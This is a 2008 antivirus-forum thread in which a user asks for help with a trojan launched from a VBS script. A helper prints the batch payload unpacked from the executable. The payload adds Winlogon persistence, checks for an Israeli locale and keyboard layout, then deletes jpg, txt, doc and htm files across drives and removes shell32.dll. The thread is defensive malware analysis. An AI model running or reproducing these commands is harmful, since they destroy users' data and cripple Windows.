14.05.2008, 22:09
Hello everybody,

I have discovered by chance a few processes running from a TMP file/VBS script.

I copy and paste the VBS script. I do not know what this Trojan is doing, but when I deleted the files and rebooted, my keyboard and mouse didnt work! I have tried several antivirus, antiroot kits and anti spyware which didnt work.
moderated::: file attached as VBS.txt

14.05.2008, 22:21
adis, can you send us a copy of this file?

Looks like this is a part of Worm.Win32.AutoRun...

15.05.2008, 00:13
I have put the vbs script and the explot.exe renamed in explot-root.exe here:


15.05.2008, 08:00
Explot-root.exe - malware.
Packed with two packers: UPX and Morphine.
Unpacked file contains .bat file which I think explains everything:

@echo off..title....reg ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d %systemroot%\system32\userinit.exe,%systemroot%\sy stem32\taskfile.exe /f....reg query "HKCU\Keyboard Layout\Preload" >>"%systemdrive%\svi\003988274\svss.lpd"..reg query "HKCU\Control Panel\International" >>"%systemdrive%\svi\003988274\svss.lpd"..find /I "0000040d" "%systemdrive%\svi\003988274\svss.lpd"..if %errorlevel%==1 exit..find /I "Israel" "%systemdrive%\svi\003988274\svss.lpd"..if %errorlevel%==1 exit....del /f /s C:\*.jpg C:\*.txt C:\*.doc C:\*.htm..del /f /s d:\*.jpgd:\*.txt d:\*.doc C:\*.htm..del/f /s e:\*.jpg e:\*.txt e:\*.doc C:\*.htm..del /f /s f:\*.jpg f:\*.txt f:\*.doc C:\*.htm..del /f /s g:\*.jpg g:\*.txt g:\*.doc C:\*.htm..del /f /s h:\*.jpg h:\*.txt h:\*.doc C:\*.htm..del /f /s I:\*.jpg I:\*.txt I:\*.doc C:\*.htm..del /f /s J:\*.jpg J:\*.txt J:\*.doc C:\*.htm....del /f %systemroot%\system32\shell32.dll..del /f %systemdrive%\svi*...

15.05.2008, 09:34
Thanks! Any idea how to cure this?

It seems it was supposed to delete me all documents and pcitures on the system. And, at the end, it was deleting itself and shell32? Do you think shell32 and tasklist are infected as well?

I have avast home edition running as antivirus on my system. It did not detect anything! Trying to cure with others didnt work either!


15.05.2008, 09:50
Thanks! Any idea how to cure this?